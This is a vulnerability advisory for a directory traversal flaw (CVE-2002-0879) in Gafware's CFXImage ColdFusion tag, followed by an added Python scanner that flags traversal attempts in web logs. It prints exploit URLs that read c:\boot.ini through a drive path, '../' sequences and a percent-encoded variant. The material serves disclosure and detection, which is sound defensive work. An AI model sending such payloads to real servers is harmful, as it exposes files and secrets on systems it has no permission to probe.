source: http://www.securityfocus.com/bid/4882/info

Gafware's CFXImage is a custom tag for ColdFusion. A program included with the CFXImage documentation does not properly filter its input. It is reported that a flaw in this program allows a malicious user to read files outside of the permitted directory structure. By using directory traversal sequences (e.g. '/../', '..') or by specifying a filename directly, an attacker can obtain files that may contain sensitive information.

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini

This allows the attacker to view the contents of 'c:\boot.ini'.
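For log review, the following added example (not part of the original advisory and not Gafware's code) flags showtemp.cfm requests whose FILE value resolves outside the temp image directory, using Windows path rules rather than a substring match on '..'. TEMP_DIR and the last three sample URLs are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed location of the temp images; the advisory does not give the real path.
TEMP_DIR = r"C:\inetpub\wwwroot\docs\temp"

def classify_file_param(value):
    """Return why a FILE value leaves TEMP_DIR, or None if it stays inside."""
    for _ in range(3):  # undo leftover percent-encoding layers, bounded
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    path = value.replace("/", "\\")  # Windows accepts both separators
    drive, rest = ntpath.splitdrive(path)
    if drive:
        return "drive-or-unc"        # e.g. c:\boot.ini or a UNC share
    if rest.startswith("\\"):
        return "rooted-path"
    # Resolve the way the file system would, then compare to the base directory.
    resolved = ntpath.normpath(ntpath.join(TEMP_DIR, path))
    if not resolved.lower().startswith(TEMP_DIR.lower() + "\\"):
        return "outside-temp-dir"
    return None

def scan(urls):
    """Return (url, reason) for each showtemp.cfm request with an unsafe FILE."""
    hits = []
    for url in urls:
        parts = urlsplit(url)
        if not parts.path.lower().endswith("/showtemp.cfm"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
        for key, values in query.items():
            if key.upper() != "FILE":
                continue
            hits += [(url, r) for r in map(classify_file_param, values) if r]
    return hits

BASE = "http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE="
SAMPLE_URLS = [  # first two are from the advisory, the rest are constructed
    BASE + "c:\\boot.ini",
    BASE + "../../../../../../../../../../../../../../../../../../boot.ini",
    BASE + "img0042.jpg",
    BASE + "thumbs/../img0042.jpg",
    BASE + "..%2F..%2Fboot.ini",
]
```

Calling scan(SAMPLE_URLS) reports the two advisory URLs and the percent-encoded request, while the plain filename and the in-directory 'thumbs/../' path pass.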
CVE: CVE-2002-0879
OSVDB: 13302
Other possible E-DB search terms: Gafware CFXImage 1.6.4/1.6.6, Gafware CFXImage